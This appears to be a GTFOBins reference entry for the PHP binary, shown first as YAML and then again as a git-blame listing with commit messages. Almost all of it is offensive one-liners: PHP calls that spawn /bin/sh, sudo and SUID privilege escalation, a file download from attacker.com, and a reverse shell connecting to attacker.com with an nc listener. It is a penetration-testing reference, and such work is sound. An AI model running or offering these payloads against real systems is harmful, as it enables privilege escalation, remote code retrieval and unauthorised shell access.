GTFOBins.github.io/_gtfobins/php.md

---
functions:
  execute-interactive:
  - code: |
      export CMD="/bin/sh"
      php -r 'system(getenv("CMD"));'
  - code: |
      export CMD="/bin/sh"
      php -r 'passthru(getenv("CMD"));'
  - code: |
      export CMD="/bin/sh"
      php -r 'print(shell_exec(getenv("CMD")));'
  - code: |
      export CMD="/bin/sh"
      php -r '$r=array(); exec(getenv("CMD"), $r); print(join("\\n",$r));'
  - code: |
      export CMD="/bin/sh"
      php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
  execute-non-interactive:
    - code: |
        export CMD="id"
        php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
  sudo-enabled:
    - code: |
        CMD="/bin/sh"
        sudo php -r "system('$CMD');"
  suid-enabled:
    - code: |
        CMD="/bin/sh"
        ./php -r "system('$CMD');"
  upload:
    - description: Serve files in the local folder running an HTTP server.
      code: |
        LHOST=0.0.0.0
        LPORT=8888
        php -S $LHOST:$LPORT
  download:
    - description: Fetch a remote file via HTTP GET request.
      code: |
        export URL=http://attacker.com/file_to_get
        export LFILE=file_to_save
        php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
  reverse-shell-interactive:
    - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
      code: |
        export RHOST=attacker.com
        export RPORT=12345
        php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
---
First commit 2018-05-21 21:14:41 +02:00			`---`
			`functions:`
Fix PHP interactive functions 2018-06-04 19:40:46 +02:00			`execute-interactive:`
			`- code: \|`
			`export CMD="/bin/sh"`
			`php -r 'system(getenv("CMD"));'`
			`- code: \|`
			`export CMD="/bin/sh"`
			`php -r 'passthru(getenv("CMD"));'`
			`- code: \|`
			`export CMD="/bin/sh"`
			`php -r 'print(shell_exec(getenv("CMD")));'`
			`- code: \|`
			`export CMD="/bin/sh"`
			`php -r '$r=array(); exec(getenv("CMD"), $r); print(join("\\n",$r));'`
			`- code: \|`
			`export CMD="/bin/sh"`
			`php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'`
Reorganize function names 2018-05-25 15:30:02 +02:00			`execute-non-interactive:`
First commit 2018-05-21 21:14:41 +02:00			`- code: \|`
Use id as non-interactive command in php 2018-05-30 11:43:17 +02:00			`export CMD="id"`
Use getenv instead of $_ENV in php as it is configuration-dependent 2018-05-25 11:16:37 +02:00			`php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'`
Add sudo and suid to php 2018-05-25 14:07:26 +02:00			`sudo-enabled:`
			`- code: \|`
Fix PHP interactive functions 2018-06-04 19:40:46 +02:00			`CMD="/bin/sh"`
Add sudo and suid to php 2018-05-25 14:07:26 +02:00			`sudo php -r "system('$CMD');"`
			`suid-enabled:`
			`- code: \|`
Fix PHP interactive functions 2018-06-04 19:40:46 +02:00			`CMD="/bin/sh"`
Add sudo and suid to php 2018-05-25 14:07:26 +02:00			`./php -r "system('$CMD');"`
First commit 2018-05-21 21:14:41 +02:00			`upload:`
			`- description: Serve files in the local folder running an HTTP server.`
			`code: \|`
			`LHOST=0.0.0.0`
			`LPORT=8888`
			`php -S $LHOST:$LPORT`
			`download:`
			`- description: Fetch a remote file via HTTP GET request.`
Fix YAMLs format 2018-06-01 00:20:23 +02:00			`code: \|`
Use target.com and attacker.com 2018-05-24 21:59:21 +02:00			`export URL=http://attacker.com/file_to_get`
Replace where_to_save with file_to_save 2018-06-04 19:53:35 +02:00			`export LFILE=file_to_save`
Use getenv instead of $_ENV in php as it is configuration-dependent 2018-05-25 11:16:37 +02:00			`php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'`
Reorganize function names 2018-05-25 15:30:02 +02:00			`reverse-shell-interactive:`
Rephrase network functions descriptions 2018-05-24 22:05:07 +02:00			- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
Add PHP reverse-shell description 2018-05-22 20:23:05 +02:00			`code: \|`
Use target.com and attacker.com 2018-05-24 21:59:21 +02:00			`export RHOST=attacker.com`
Fix trailing spaces 2018-05-25 01:10:39 +02:00			`export RPORT=12345`
Use getenv instead of $_ENV in php as it is configuration-dependent 2018-05-25 11:16:37 +02:00			`php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'`
Fix trailing spaces 2018-05-25 01:10:39 +02:00			`---`